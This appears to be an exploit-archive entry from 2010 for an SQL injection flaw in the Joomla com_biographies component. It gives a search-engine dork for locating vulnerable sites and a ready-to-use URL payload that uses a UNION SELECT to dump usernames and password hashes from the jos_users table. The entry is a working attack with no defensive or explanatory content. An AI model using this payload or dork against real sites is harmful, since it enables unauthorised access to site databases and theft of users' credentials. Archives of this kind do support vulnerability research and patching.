id: 10707
date: 01/22/2010
title: Joomla Component com_biographies SQL injection Vulnerability
author: Snakespc
cves: 

============================================================
Joomla Component com_biographies SQL injection Vulnerability
============================================================

#--------------------------------------------------------
#Joomla (com_biographies) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc
#site:anti-sec.info/vb/index.php     
#-------------------------------------------------------
#Dork:inurl"com_biographies"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--



#  0day.today [2023-03-27]  #